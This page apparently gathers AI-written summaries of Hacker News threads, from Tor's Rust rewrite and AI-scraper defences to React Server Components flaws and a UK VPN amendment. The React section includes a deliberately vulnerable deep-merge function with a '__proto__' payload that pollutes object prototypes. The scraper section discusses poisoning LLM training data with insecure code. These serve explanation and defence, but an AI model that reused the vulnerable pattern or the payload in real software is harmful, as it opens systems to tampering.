Hacker News, Distilled

AI-powered summaries for selected HN stories.


The Tor Project is switching to Rust

Language choice & “right tool” framing

  • Many commenters support the move if it solves Tor’s real pains, emphasizing “right tool for this project” over “language X is universally better.”
  • Some argue the rationale given (memory safety, maintainability) applies to many network-facing, security-critical apps, not just Tor.
  • Others are tired of “rewrite in Rust” stories, suggesting similar impact could come from profiling, dependency trimming, or refactoring in-place.

Security, memory safety, and Rust vs C

  • Supporters: Tor’s threat model (untrusted data, state-level attackers, long-lived C code) makes memory safety and strong static analysis particularly valuable. Rust’s type system, ownership model, and pattern matching are seen as major wins.
  • Skeptics:
    • Point out that Rust still has unsafe code, logic bugs, and supply-chain risk, and that it doesn’t replace formal verification.
    • Note Tor’s historical C vulnerabilities don’t show many severe remote exploits; most past issues were logic bugs.
  • Several note Rust’s safety gains are real but often overstated or used as marketing; formal methods (SPARK, CompCert, etc.) still provide stronger guarantees for truly critical components.

Performance and Tor’s slowness

  • Consensus that Tor’s speed is dominated by network and anonymity constraints (multiple hops, TLS, exit bottlenecks), not language choice.
  • A few hope Rust might indirectly help explore new protocol optimizations faster, but expectations of raw speedup are low.
  • Some joking/sarcastic suggestions about reducing hop count are rebutted as destroying anonymity.

Rewrites, Arti, and migration strategy

  • Commenters note this is a multi‑year effort (Arti started ~2020, 1.0 in 2022), not a sudden switch.
  • The rewrite is framed by Tor as necessary because the old C codebase was hard to safely evolve, not as anti‑C rhetoric.
  • Examples from other projects (fish shell, TypeScript, browsers) are used to argue that full rewrites can work if staged and carefully managed.

Ecosystem, tooling, and portability concerns

  • Pro‑Rust points: good library ecosystem, easier to embed as a library, strong Windows support, better ergonomics than legacy C/C++ build systems.
  • Concerns:
    • Heavy dependency trees and npm‑like supply‑chain risk.
    • Compiler/toolchain churn and older/obscure platform support (old macOS, OpenBSD i686, exotic architectures).
    • Fear that Rust will “creep everywhere,” forcing more people to adopt new toolchains.

Alternatives, culture, and hype

  • Some ask “why not Go” (GC, simpler, more devs); others respond that Rust’s low‑level control and C interop fit Tor’s needs better.
  • Several threads lament Rust “cultishness” vs. defenders who see criticism as overblown; broader frustration with industry-wide rewrite/hype cycles recurs.

Tor operations & fingerprinting

  • Practical advice: run relays or bridges instead of exits to avoid legal trouble while helping the network.
  • Separate discussion on browser fingerprinting tools finds Tor Browser (especially with JS off) among the strongest at resisting tracking, though some question test methodologies.

Koralm Railway

Project scale and timeline

  • Koralm Tunnel is ~33 km twin-bore, part of a 130 km line with extensive tunnels and structures, built over ~27 years (1998–2025), with the main tunneling 2008–2020 and recent years spent on fit‑out and testing.
  • Some commenters initially felt 17–27 years was “too long,” but others stressed the geological and engineering difficulty and the long testing/safety phase.

Budget, “within budget” and HN title norms

  • Original estimate (around 2005) was ~€5.5B vs ~€5.9B actual; some call this “within budget” or “slightly over,” others note it’s about 7% higher.
  • Inflation and added sections mean it can be framed as under/over depending on accounting; regardless, many see this as an unusually good outcome for a 20‑year megaproject.
  • A long subthread criticizes the HN submission title for editorializing (“within budget”) when the linked page doesn’t mention costs, invoking HN guidelines. Others argue it’s fair context drawn from other sources and not misleading.

Engineering difficulty and geology

  • Commenters highlight extremely challenging Alpine geology: “about as bad as it gets,” with mixed boring/blasting, fault zones, high depth, elevated rock temperatures (~32–39°C), and substantial safety/ventilation systems.
  • Comparisons with Tokyo’s Toei Oedo line and other tunnels emphasize that metro projects in uniform alluvial soils are not directly comparable to deep Alpine base tunnels.

Travel impact and network context

  • The new line cuts Graz–Klagenfurt travel from ~3 hours to ~45 minutes by avoiding detours through narrow valleys and many intermediate stops.
  • Together with the Semmering Base Tunnel, it will significantly shorten Vienna–Graz/Klagenfurt trips.
  • Some users share personal excitement, having followed the project since childhood.

EU funding, signage, and politics

  • Commenters note the EU co-funding, which sparks debate over “funded by EU” billboards: design inconsistency annoys some, while others defend minimalist, cheap communication.
  • Signs are intended to make EU benefits visible; effectiveness is debated, referencing Brexit regions that were major beneficiaries.
  • Discussion touches on Austria as a net EU contributor, but with political and planning benefits from EU‑level funding decisions.

Rail culture, pricing, and comparisons

  • Several compare Austria’s competent, relatively on‑time, on‑budget rail building to the UK’s HS2, US “Big Dig,” California HSR, and Canadian light rail cost overruns and delays.
  • Austrian trains are seen as culturally central, comfortable, and generally preferred over buses, though single intercity tickets can be expensive without passes.

Young journalists expose Russian-linked vessels off the Dutch and German coast

Perceived (In)Competence of German/EU/NATO Response

  • Several commenters see the German state as amateurish and passive, with “symbolic” ship inspections and no visible countermeasures, eroding trust in defense.
  • Others argue intelligence services almost certainly know about the vessels and drones; the real issue is political decision-making, not information gaps.
  • Suspected reasons for restraint: fear of legal blowback under maritime law, desire to avoid escalation, or using the “Russian scare” for EU/NATO integration or domestic politics.
  • Some extend responsibility to NATO and the US, noting US troops on European soil and suggesting Washington may be pushing de‑escalation.

Why Not Just Seize Ships or Shoot Down Drones?

  • Strong debate over practicality and legality:
    • Shooting drones over populated areas risks debris and stray fire; many countries until recently lacked clear legal authority to down drones that aren’t an immediate kinetic threat.
    • Examples are cited of the Dutch firing on drones and of new German laws enabling police/military action, but implementation is seen as slow.
  • Technically, many drones fly fast and high; ground fire is ineffective except at short range. Interceptor drones, radars, and jamming are seen as the real solution but not yet widely deployed.
  • Some insist ships in international waters could be boarded by special forces, citing other tanker seizures; others emphasize legal and political complications and escalation risks.

Threat Perception: Real Danger vs “Fear-Mongering”

  • Eastern European voices (notably from Poland) describe feeling already under hybrid attack (drones, propaganda, online hate campaigns), and frustrated by “lukewarm” Western support for Ukraine and continued EU payments for Russian energy.
  • Some Western Europeans admit earlier naïveté about Russia post–Cold War and express shame at limited aid, but still back NATO/EU as the “lesser evil.”
  • Others suspect the drone issue is being exaggerated for domestic agendas, likening it to UFO panics or Cold War submarine scares, and argue Russia’s conventional capabilities look underwhelming.

OSINT, Journalism, and Policy Impact

  • The young journalists’ OSINT work is widely praised as “legendary” and as evidence that open-source methods can track shadow fleets.
  • Many assume agencies already had this data; the article is seen as exposing public–political gaps rather than discovering unknown threats.
  • Several commenters doubt it will change EU policy quickly, given slow legislative processes and a perceived tendency toward symbolic financial measures (e.g., asset freezes) instead of rapid hard-security actions.

Guarding My Git Forge Against AI Scrapers

AI Data Poisoning & Information Warfare

  • Several comments explore the idea of deliberately poisoning LLM training data (e.g., esoteric languages, insecure code) to bias models or degrade their usefulness.
  • People reference claims that relatively small poisoned datasets can impact models, and that state actors are already “LLM grooming” via propaganda.
  • Others push back on specific journalism about Russian disinformation, arguing the cited article lacks evidence and over-villainizes entire nations; some counter that Russia’s behavior largely fits that description.
  • There is general agreement that nation-state information ops exist, but details and scale are contested or seen as unclear.

Scraper Behavior, Inefficiency, and Motives

  • Multiple self-hosters report scrapers hammering every blame/log view and repeating it frequently, suggesting naïve recursive crawlers with heavy parallelization.
  • Comments note most bots just follow links via HTTP, don’t use git clone, and often ignore robots.txt; optimization is rare because bandwidth and compute are externalized costs.
  • Some suggest many operators are “script kiddies” or spammer-like actors chasing quantity, not quality; others speculate some abusive traffic may not even be for AI training but for generic data resale or anti-decentralization incentives.

Defensive Techniques

  • Config toggles: Gitea’s REQUIRE_SIGNIN_VIEW=expensive is praised as cutting AI traffic and bandwidth drastically while still allowing casual browsing; full login-only modes or OAuth2 proxies for heavy repos also work well.
  • Network controls: putting forges behind Wireguard/Tailscale VPNs, IP/ASN or country-level blocking (especially for non-global audiences), and HTTP/2 requirements are common patterns; people warn about false positives (e.g., travelers, Starlink).
  • Fingerprinting: JA3/JA4 TLS fingerprints, TCP header quirks, and browser-like headers help distinguish many bots from real users; residential proxies and SIM-based botnets complicate this.
  • Architectural fixes: static git viewers (stagit, rgit, custom static sites) served by simple HTTP servers, or throttling via reverse proxies, dramatically reduce load (see the sketch after this list).
  • “Punitive” responses: tools like Anubis or Iocaine that serve garbage/mazes to suspected bots have reportedly slashed traffic from hundreds of thousands of hits/day to a tiny fraction.
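
A minimal sketch of the header-blocking and throttling idea above, written in TypeScript against Node's built-in http module. The user-agent patterns, rate limit, and port are illustrative assumptions, not settings from any tool named in the thread, and the actual reverse-proxy step to the forge is left out:

      import http from "node:http";

      // Crude per-IP counter and user-agent blocklist; everything here
      // (patterns, window, limit, port) is an illustrative placeholder.
      const BLOCKED_UA = [/GPTBot/i, /CCBot/i, /Bytespider/i];
      const WINDOW_MS = 60_000;
      const MAX_REQS = 120;
      const hits = new Map<string, { count: number; since: number }>();

      const server = http.createServer((req, res) => {
        const ua = req.headers["user-agent"] ?? "";
        if (BLOCKED_UA.some((re) => re.test(ua))) {
          res.writeHead(403).end("crawling disabled\n");
          return;
        }

        const ip = req.socket.remoteAddress ?? "unknown";
        const now = Date.now();
        const entry = hits.get(ip);
        if (!entry || now - entry.since > WINDOW_MS) {
          hits.set(ip, { count: 1, since: now });
        } else if (++entry.count > MAX_REQS) {
          res.writeHead(429, { "Retry-After": "60" }).end("slow down\n");
          return;
        }

        // A real deployment would proxy the allowed request to the forge here.
        res.writeHead(200, { "Content-Type": "text/plain" });
        res.end("request would be forwarded to the forge\n");
      });

      server.listen(8080);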

Ethics, Net Neutrality, and the “Free Web”

  • Several distinguish respectful, mutually beneficial scraping (e.g., search indexing) from abusive AI scraping that behaves like a slow DDoS and diverts users to regurgitated content without attribution or compensation.
  • Some argue “the web should be free for humans,” but bots abusing that norm justify technical barriers—framed as a “paradox of tolerance” moment.
  • Others worry that rising abuse is pushing hobbyist and small sites off the public internet and into VPN-only or heavily walled-garden setups, undermining the original borderless ideal.

Legal / Contract Proposals

  • Ideas like EULAs billing “non-human readers” or forcing model source-code disclosure are floated, but replies broadly agree these are unenforceable: bots hide behind fake UAs and foreign IPs, and there is no practical mechanism for collection or jurisdiction.

Personal Impact & Sentiment

  • Many self-hosters describe depressing bot:human ratios (often 95%+ bots), fans spinning from pointless traffic, and services shut down or locked away as a result.
  • There is a sense of attrition: keeping a small public forge open increasingly means fighting large-scale scraping operations with far more resources.
  • A brief ad hominem jab at the blog author’s identity is countered by others as irrelevant to the technical validity of the article.

Google de-indexed Bear Blog and I don't know why

Google’s Power and Centralization

  • Several comments relate the de-indexing story to broader concerns that Google effectively decides which businesses and voices survive online.
  • Google Maps is cited as having displaced TripAdvisor and local review sites; some share personal experiences of Google wiping out competitors by absorbing their data.
  • Others argue centralization is “efficient” due to network effects and user laziness, while critics say this is really just monopoly power disguised as efficiency.

Declining Search Quality and Opaque Indexing

  • Many report random de-indexing or deep demotion of sites (blogs, shops, even very large sites) with no clear explanation from Search Console.
  • Complaints include misclassified duplicate content, missing pages in specific regions, and inconsistent indexing between Google and Bing.
  • Search results are described as increasingly polluted with spam, fake products, and auto-translated content (notably Reddit), with some saying Google has neglected search in favor of ads and AI.

Speculated Technical Causes of De‑indexing

  • Hypotheses include: invalid RSS triggering hidden spam heuristics; canonical URL confusion; duplicate content via reverse proxies; sitemap structure/size issues; Unicode-heavy URLs; and odd 301/304 caching interactions.
  • Some note Google’s recent change in how it counts impressions/clicks, suggesting methodological shifts may also impact visibility.
  • Several point out that false positives are inevitable in large anti-spam systems, but the lack of diagnostics or support makes recovery guesswork.

Spam, Negative SEO, and Abuse Patterns

  • One detailed case describes attackers using a site’s search page: spammy queries get echoed in H1/title, Google crawls those URLs, and the site is reclassified as scammy until search pages are noindexed (see the sketch after this list).
  • Commenters mention similar tricks (fake support numbers, reputation management “hacks”) and describe this as a form of negative SEO.
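
One concrete way to apply that noindex fix, sketched in TypeScript with Node's built-in http module (the /search path and port are illustrative; the X-Robots-Tag header is a standard signal that major crawlers honor, equivalent to a robots meta tag):

      import http from "node:http";

      const escapeMap: Record<string, string> = {
        "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
      };
      const escapeHtml = (s: string) => s.replace(/[&<>"']/g, (c) => escapeMap[c]);

      const server = http.createServer((req, res) => {
        const url = new URL(req.url ?? "/", "http://localhost");
        if (url.pathname === "/search") {
          // Tell search engines not to index internal search results, so
          // spammy queries echoed into the title/H1 can't be crawled and
          // held against the site.
          res.setHeader("X-Robots-Tag", "noindex, nofollow");
          res.writeHead(200, { "Content-Type": "text/html; charset=utf-8" });
          const q = escapeHtml(url.searchParams.get("q") ?? "");
          res.end(`<h1>Results for ${q}</h1>`);
          return;
        }
        res.writeHead(404).end("not found\n");
      });

      server.listen(8080);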

Alternatives: P2P, Law, and Coping Strategies

  • Some call for a P2P, RSS-like, or webring-based discovery layer; others respond that such tech exists but lacks adoption.
  • A strong thread argues this is fundamentally a political/antitrust problem that should be tackled by breaking up Google, while skeptics cite laws like the DMCA as evidence governments often worsen concentration.
  • A few rely on mailing lists or other media and deliberately de-index themselves, but most acknowledge heavy dependence on Google and the fragility this creates.

CRISPR fungus: Protein-packed, sustainable, and tastes like meat

Environmental impact & economics vs chicken

  • Some see gene-edited fungal protein as clearly greener than industrial chicken and cell-cultured meat, and hope economics will follow.
  • Others argue backyard chickens on scraps and bugs can be extremely low-impact, but multiple replies stress this is negligible at global scale; most chicken is from huge intensive operations.
  • Back-of-envelope estimates show that matching US per-capita chicken consumption would require substantial backyard flocks, feed inputs, and regulatory overhead; disease risk might increase with “every yard has chickens.”
  • Industrial chicken’s extremely low cost is tied to specialized breeds (e.g., Cornish cross), rapid growth (6–7 weeks), cheap feed, and scale; home production tends to only break even vs premium organic, never vs discount supermarket chicken.

Technology, biology, and safety

  • The edited fungus is the same species used in Quorn. CRISPR is used for gene knockouts (e.g., chitin synthase) rather than adding foreign genes, leading some to note it might be treated more leniently than classic GMOs in the EU.
  • Thinner cell walls and lower chitin may improve digestibility. Replacing poultry with fungal protein could reduce avian flu risk and antibiotic use, and outbreaks in bioreactors are easier to control than in live animals.
  • A key technical constraint: single-cell protein tends to have high nucleic acid content, which can cause excess uric acid. Heat treatments to reduce this can damage cells and cut yields (~35% reported), though waste streams might be repurposed as fertilizer.
  • Discussion links this to gout, genetics, and the broken human urate oxidase pathway; some wonder why such species-level defects aren’t more aggressively targeted by medicine.

Climate, livestock, and AI datacenters

  • A subthread contrasts emissions from livestock vs data centers. Cited figures: livestock at ~10–20% of global GHGs vs data centers at <0.3%, suggesting a small cut in meat consumption saves more emissions than a large cut in compute.
  • Others push back on framing, arguing both should be scrutinized; some see “AI vs cows” as a distraction from industrial agriculture’s outsized footprint (deforestation, animal welfare).

Health, “ultra-processed,” and diet

  • Several worry that fungal meat analogs will be lumped into “ultra-processed foods.” Some argue that category meaningfully tracks worse health outcomes; others say it’s mostly correlation and confounds, and that processing per se isn’t inherently bad.
  • There’s debate over whether the UPF narrative is being weaponized (possibly by incumbents) against novel, engineered protein sources.

Taste, culture, and acceptance

  • Some vegetarians say they no longer desire meat and prefer good vegetable-based cuisines; others, even long-term vegetarians, still crave burgers or wings and welcome convincing substitutes.
  • It’s noted that for most buyers, familiar frames like “chicken nuggets” matter more than novel foods, and that much “meat flavor” is actually sauce and seasoning.
  • There is curiosity about inventing entirely new, delicious flavor/texture experiences, but replies point out constraints: taste receptors are fixed; most novelty comes from aroma chemistry, texture, and cultural conditioning.

Ethics, politics, and IP

  • A few see advances like this as removing any remaining “excuse” to kill animals; others argue most people simply don’t share that moral view.
  • Some speculate farm lobbies will try to restrict such products once they threaten poultry; others note farmers might welcome selling feedstock to stable, biosecure fermentation operations.
  • Concerns are raised about licensing and patents: chickens don’t carry CRISPR license fees, while GMO seeds already do; gene-edited animals might eventually be similarly locked up.

Skepticism and alternatives

  • One commenter suspects this is partly investor hype built on a previously underwhelming product class (fungal meat substitutes), but others point out that brands like Quorn are already widely sold.
  • Alternative protein ideas like “air protein” (gas-fed microbes) and mushroom foraging are mentioned as parallel or complementary approaches.

Nokia N900 Necromancy

Nostalgia and real-world use

  • Many share strong affection for the N800/N810/N900/N9 era: first “real” pocket computers, formative Linux-learning devices, and all‑time favorite phones.
  • Common memories: Bluetooth tethering to dumb phones, hunting Wi‑Fi on campus, using Google Voice to dodge SMS fees, running Apache/Python or webservers, hosting WebSocket demos, and even doing academic work (e.g., hypervisors, emulators) on them.
  • The N900 is repeatedly praised for its slide‑out keyboard, FM transmitter, IR blaster, offline maps, stereo speakers, kickstand, and Debian‑based Maemo with apt‑get.

Hardware mods, batteries, and power

  • Some argue the article’s battery hack is overkill when BL‑5J replacements are still sold; others distrust “OEM/genuine” claims for 16‑year‑old packs.
  • Explanation of the supercapacitor approach: old Li‑ion cells develop high internal resistance, making them poor transient current buffers; large caps restore stable voltage under load for always‑powered use (a rough worked example follows this list).
  • Side discussions on BL‑5J as a nice project form factor and on quirks like N810’s inability to recover from a fully drained battery over USB alone.
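
A rough worked example of that internal-resistance argument, with illustrative numbers rather than measurements from the article: if an aged cell's internal resistance has risen to about 0.5 Ω and a radio burst draws roughly 2 A, the momentary sag is

      \Delta V = I_{\text{burst}} \cdot R_{\text{int}} \approx 2\ \text{A} \times 0.5\ \Omega = 1\ \text{V}

which can pull a nominal 3.7 V pack toward the device's brown-out threshold; a large, low-ESR capacitor across the rails supplies the transient current instead, keeping the voltage stable.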

2G/3G shutdown and legality of DIY base stations

  • Several note that N900‑class devices are losing phone functionality as 2G/3G are phased out, with timelines varying by country; some links and claims conflict, and details are labeled “messy” or outdated.
  • Running one’s own 2G/3G cell is discussed: technically possible (especially for 2G) but generally illegal or tightly constrained because spectrum has been reallocated.

Nokia, Maemo/Meego, and missed opportunities

  • Strong sentiment that Nokia “had it” early: internet tablets from 2005, Linux phones, Skype + webcams years before iPhone/Android maturity.
  • Multiple accounts say operators feared open Linux devices; Nokia obeyed carrier demands (e.g., limiting telephony, Skype), while Apple forced operators to accept its terms and bypassed SMS/MMS economics.
  • Debate over whether betting on Linux vs Symbian was a mistake: some blame the OS choice, others say UX and corporate structure mattered far more.
  • Many attribute the platform’s death to internal politics and the later Microsoft pivot (Elop, Windows Phone), not technical inferiority.

Desire for modern successors and hacker ethos

  • Ongoing longing for a modern N900‑like “pocket cyberdeck” with keyboard and real Linux. Existing options mentioned: PinePhone, Librem 5, Sailfish/Jolla devices, Fxtec/Planet/GPD, but none are seen as a true successor.
  • Skepticism about commercial viability: niche demand (HN “weirdos”) vs mass‑market expectations and banking apps tied to Android/iOS.
  • One thread explores how to gain the skills behind such hacks: advice centers on gradual tinkering (Arduino/Raspberry Pi/RISC‑V, Gentoo, embedded work) and accumulating experience rather than any single formal path.
  • A few extrapolate to a future split between tightly attested, locked‑down mainstream devices and a “cyberpunk” parallel web of rooted, owner‑controlled hardware—where N900‑style freedom is the ideal.

Ensuring a National Policy Framework for Artificial Intelligence

Scope and Legality of the Executive Order

  • Order aims to block or weaken state-level AI regulation and push toward a single national framework.
  • Several commenters note the article originally lacked policy details; link was later updated to the EO text.
  • Many argue an EO cannot by itself preempt state law; it can only direct executive-branch behavior and litigation strategy.

Federal vs. State Authority and Preemption

  • Strong focus on the Commerce Clause, with some saying AI clearly falls under interstate commerce and thus federal jurisdiction.
  • Others reply that preemption requires an actual act of Congress, not an EO, and that Congress explicitly declined to pass such a moratorium on state AI laws.
  • A congressional research brief on federal preemption is shared as context; some call the EO an attempt at “executive preemption.”

Use and Abuse of Executive Power

  • Commenters note Trump’s heavy use of EOs and compare counts across recent presidents.
  • One camp sees this as governing “by fiat” because he can’t or won’t work with Congress.
  • Another argues presidents naturally use any power they can; the deeper issue is whether the courts and Congress will enforce limits.
  • Some expect the Supreme Court’s recent doctrines limiting agency power to eventually curb broad executive action.

States’ Rights and Partisanship

  • Many point out the irony of a party that rhetorically favors “small government” and “states’ rights” now centralizing AI policy.
  • Historical arguments surface (Civil War, 14th Amendment, Wickard v. Filburn) to show long-term erosion of robust state experimentation.

Corruption, Lobbying, and Oligarchy

  • Multiple comments describe the EO as nakedly serving large tech firms and donors, likening the arrangement to tribute or bribery rather than ordinary lobbying.
  • Some see this as another step toward oligarchic or “Russian-style” politics, with policy shaped directly by billionaire interests.

AI, Innovation, and Labor

  • Supporters say a uniform, light-touch national regime is necessary to keep the U.S. ahead in AI and to avoid a patchwork of restrictive state laws.
  • Critics worry the order strips already-weak guardrails and accelerates harmful deployment (“paperclip”–style fears).
  • There’s a debate over whether AI-driven productivity will benefit workers:
    • One side: more automation → higher productivity → higher wages and wealth.
    • Other side: recent decades show productivity gains accruing mainly to capital; AI may deepen inequality and hollow out the middle class.

Public Opinion and Political Context

  • Some argue Trump is politically weak and AI is broadly unpopular, so enacting binding federal law will be difficult.
  • Others contest claims about his popularity with conflicting polling interpretations.
  • A minority of commenters explicitly welcome the EO as a needed brake on “anti-AI” state movements.

Denial of service and source code exposure in React Server Components

Security impact and patching

  • React disclosed new RSC vulnerabilities: denial of service and source code exposure in the server components protocol.
  • The new issues affect the patches from the previous week; projects that already upgraded must upgrade again.
  • Some note npm audit and GitHub advisories lag behind, so tools may say “no issues” while upgrades are still required.
  • There’s debate over messaging: some see the “follow‑up CVEs are common” line as defensive perception management; others view it as reasonable context.
  • Several commenters question why the DoS issue is rated more severe than source code exposure, arguing breaches are usually worse than downtime.

Concerns about RSC design and security model

  • Many criticisms center on RSC blurring client/server boundaries, making it hard to know what runs where and how data flows.
  • RSC requires a custom deep (de)serialization/RPC protocol, seen as opaque and risky, especially given JavaScript’s dynamic features (prototypes, Function from string, Promise hijacking); a generic illustration follows this list.
  • Some argue these bugs validate earlier worries that tightly coupling client and server in one codebase is an architectural foot‑gun that will keep surfacing vulnerabilities.
  • Others stress that the main problems so far are in the serializer, not in static client/server separation, and claim the surface area is now relatively fixed.
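
To make the "dynamic features" concern concrete, here is a generic illustration in TypeScript of the classic deep-merge prototype-pollution pattern; it is not the RSC wire protocol, just the kind of dynamism commenters worry about in any hand-rolled deep deserializer:

      // A naive recursive merge, as often found inside ad-hoc deserializers.
      function deepMerge(target: any, source: any): any {
        for (const key of Object.keys(source)) {
          if (source[key] !== null && typeof source[key] === "object") {
            target[key] = deepMerge(target[key] ?? {}, source[key]);
          } else {
            target[key] = source[key];
          }
        }
        return target;
      }

      // Untrusted input smuggles a "__proto__" key past JSON.parse...
      const untrusted = JSON.parse('{"__proto__": {"polluted": true}}');
      deepMerge({}, untrusted);

      // ...and now every plain object in the process inherits the property.
      console.log(({} as any).polluted); // true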

React/Next complexity, docs, and developer experience

  • Multiple people say RSC and the Next.js App Router dramatically increased complexity compared to the older Pages router or classic SPA setups.
  • Complaints include: unclear execution environment, awkward constraints, difficulty debugging, and an “impenetrable” codebase with heavy vendoring.
  • There’s frustration with React’s documentation pace and Next’s tendency to expose experimental React features as “the new standard.”
  • Some, however, report great productivity with RSC/App Router, appreciating the ability to avoid REST/GraphQL layers and write “URL → HTML” directly.

Architectural philosophy and alternatives

  • A large contingent calls for returning to clearer separations: server-rendered HTML (Rails, Laravel, Django, etc.) plus light JS or JSON APIs for SPAs.
  • Others defend server‑driven UI (e.g., Phoenix LiveView, Blazor, Hotwire, Inertia) as reducing duplication and client/server drift, at the cost of latency and server resources.
  • There’s recurring criticism that React/Next/Vercel are driven by ecosystem lock‑in and hosting incentives, not just technical merit, while Meta itself does not yet use RSC.
  • Many suggest simpler stacks—traditional SSR, htmx, Inertia.js, Vue/Svelte, Remix/TanStack, or plain SPAs—as safer, more understandable defaults for most apps.

UK House of Lords attempting to ban use of VPNs by anyone under 16

Status and legislative context

  • The VPN ban is a single amendment from three members of the House of Lords, not government policy yet.
  • Commenters explain that the Lords can propose and delay but the elected Commons has primacy; many amendments die in this back‑and‑forth.
  • Some ask whether this is “fringe whackjobs” or a real threat; others note similar “fringe” ideas have a habit of returning until something passes.

Stated goals vs perceived motives

  • Officially the driver is child protection, extremism, and enforcing previous online‑safety laws that are easily bypassed via VPNs.
  • Many see “think of the children” as a pretext to:
    • De‑anonymize the internet via mandatory age verification and digital ID.
    • Restore government and legacy‑media control over information and narrative.
    • Expand already‑active UK speech policing.

Free speech, extremism, and UK norms

  • Several posts argue the UK is already arresting thousands per year over online communications, blurring lines between threats, hate speech and political dissent.
  • Others counter that many such cases involve explicit incitement or threats and that the numbers and framing are exaggerated.
  • Tension is noted between US‑style absolutist free speech and UK/European traditions where “offensive” or extremist speech is more regulable.

Technical feasibility and circumvention

  • Commenters highlight trivial workarounds: Tor, free VPNs, SSH tunnels, foreign eSIMs, laptops vs phones, and “family” VPN accounts.
  • This leads to fears of an inevitable ratchet: if VPN bans fail, pressure will grow to restrict SSH, open Wi‑Fi, DNS, and even general‑purpose computers.

Digital ID, CSAM scanning, and surveillance trajectory

  • The proposal is tied to UK digital ID capabilities that let third parties verify attributes, seen as a backbone for universal age‑gating.
  • A separate clause requiring “tamper‑proof” anti‑CSAM system software on devices alarms people more than the VPN ban: it implies mandatory, unremovable on‑device surveillance and a legal attack on user‑controlled operating systems.
  • This is linked to Apple’s earlier CSAM‑scanning design and to similar pushes in Australia, Brazil and the EU; many see a coordinated Western trend toward 1984‑style monitoring, facial recognition, and “social credit”‑like control.

Alternatives and internal disagreements

  • Some support strong restrictions on kids’ social media but oppose identity‑linked enforcement, suggesting:
    • Age‑graded domains/TLDs and ISP‑level child VLANs.
    • Privacy‑preserving, attribute‑only digital credentials.
    • More parental education and device‑level controls rather than criminalisation.
  • Others argue that any such infrastructure is inherently ripe for abuse and that the only sustainable answer is cultural: media literacy, parenting, and accepting that the “optimal amount of crime is non‑zero.”

My productivity app is a never-ending .txt file (2020)

Appeal of the single text-file system

  • Many commenters report using similar systems for years or decades: one long .txt per job, per project, per month, or per week.
  • People value how fast it is to “just type” with essentially zero latency or UI friction, and no need to think about structure before capturing a thought.
  • Several say they rarely revisit old notes; the main benefit is thinking while writing and having a short-term “working memory” for the last days or weeks.

Simplicity, portability, and longevity

  • Plain text is praised for: zero dependencies, maximal portability, backup/version-control friendliness, and being outage-proof.
  • Moving away from proprietary tools like OneNote is described as painful, reinforcing the value of open formats.
  • Some note that a text editor is unlikely to “break” with OS updates, unlike a custom app.

Discipline and habits vs the tool

  • Multiple comments argue the real “productivity hack” is the daily habit of rewriting/curating the list, not the format.
  • Others admit they’d abandon such a system quickly, or get overwhelmed as files grow, and express envy of those who can maintain it.

Variations on the basic idea

  • Common patterns:
    • Rotating files (daily/weekly/monthly/quarterly) to keep size manageable.
    • Using YAML or org-mode for lightweight structure and time-based views.
    • AutoHotkey/bash helpers to insert dates, open the right file, or create date-based folders (a small sketch in this spirit follows this list).
    • Some prepend new entries at the top; others append and periodically archive.
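
A small helper in the spirit of those date-insertion scripts, sketched in TypeScript for Node (the notes directory and one-file-per-month layout are illustrative choices, not taken from the article): run it with the note text as arguments and it appends a dated line to the current month's file.

      import { appendFileSync, mkdirSync } from "node:fs";
      import { join } from "node:path";
      import { homedir } from "node:os";

      const now = new Date();
      const dir = join(homedir(), "notes");
      mkdirSync(dir, { recursive: true });                             // e.g. ~/notes

      const file = join(dir, `${now.toISOString().slice(0, 7)}.txt`);  // e.g. 2025-03.txt
      const stamp = now.toISOString().slice(0, 10);                    // e.g. 2025-03-14
      const entry = process.argv.slice(2).join(" ") || "(empty note)";

      appendFileSync(file, `${stamp}  ${entry}\n`);                    // append, never rewrite
      console.log(`appended to ${file}`);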

Access, search, and AI/LLMs

  • Mobile access is a recurring pain point: huge files lag on phones, and Dropbox/iCloud flows can be clumsy.
  • Suggestions range from simple grep/Hyperestraier to local LLM assistants that auto-extract metadata, summarize, or answer natural-language queries over the text.

Alternatives: apps and analog systems

  • Many describe different “final resting places” after bouncing between tools: Obsidian, Notesnook, OneNote, Google Keep/Docs, Amplenote, tasks.org, spreadsheets, calendars, Reminder apps, Joplin, Notion-like tools.
  • Others prefer paper notebooks, loose sheets, or “note to self” chats, often with a weekly carry-over of remaining tasks.

Broader reflections

  • Several tie this to a larger preference for plain text and minimal, durable tools over complex, trend-driven productivity apps, with debate about how much modern software has truly improved on older tech.

An SVG is all you need

Interactive power of SVG + JS

  • Many comments highlight that SVG plus embedded JavaScript and CSS can recreate much of what Flash once did (keyboard/mouse interaction, audio, animations).
  • Examples mentioned: interactive CNC assembly diagrams, a chess engine running entirely inside an SVG, SVG-based dashboards, a barbecue controller UI, a music game, a dance–blocking/choreography tool, SCADA-style monitors, and decorative/animated wallpapers.
  • SVG is treated as part of the DOM: scripts inside an <svg> behave like in normal HTML, enabling D3, Observable Plot, and other libraries for rich data visualization and research figures.

Tooling, authoring, and workflows

  • Designer tools already output SVG; some people generate SVG via Python for charts or build apps that emit SVG from code.
  • There’s experimentation with LLMs to manipulate SVG or compress QR-code SVGs, though some doubt current models handle complex SVG well.
  • New tools appear for markdown-to-SVG and for interactive research sites that reproduce paper figures in the browser.
  • Others note pain points: limited editors (especially on Linux), difficulty handling transforms and path extraction, and a desire for better, Word-like editors for HTML/SVG “documents.”

Portability, compatibility, and longevity

  • A key positive: a 20‑year‑old SVG still renders and remains interactive in modern browsers, which is seen as strong evidence of spec stability.
  • At the same time, people report real-world issues: Safari rendering bugs, lack of support in Slack, iOS native apps, email clients, and many Open Graph preview contexts.
  • SVG is praised for crisp scaling, but fonts and text are tricky: no native text wrapping, awkward or heavy font embedding, and inconsistent rendering across renderers.

Performance and complexity tradeoffs

  • Some report SVG becoming slow or memory‑hungry with many elements (dense maps, QR codes, chess grids, complex diagrams), and note that canvas/WebGL can be more efficient.
  • Others say they’ve built complex animations with hundreds of elements that perform fine, arguing that bad performance is usually in how it’s used.
  • There’s debate over whether SVG is suitable for highly interactive scientific environments, with disagreement on how “complex” it can get before frame rates suffer.

Security and sanitization

  • Inline SVGs can embed scripts and external references, triggering security reviews.
  • Suggested mitigations: strong Content Security Policy for served SVGs, sandboxing on separate domains, and sanitization tools (DOMPurify, svg-hush); a minimal DOMPurify sketch follows this list.
  • A linked write-up frames SVG as a significant attack surface; some respondents counter that CSP and proper handling largely address this.
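
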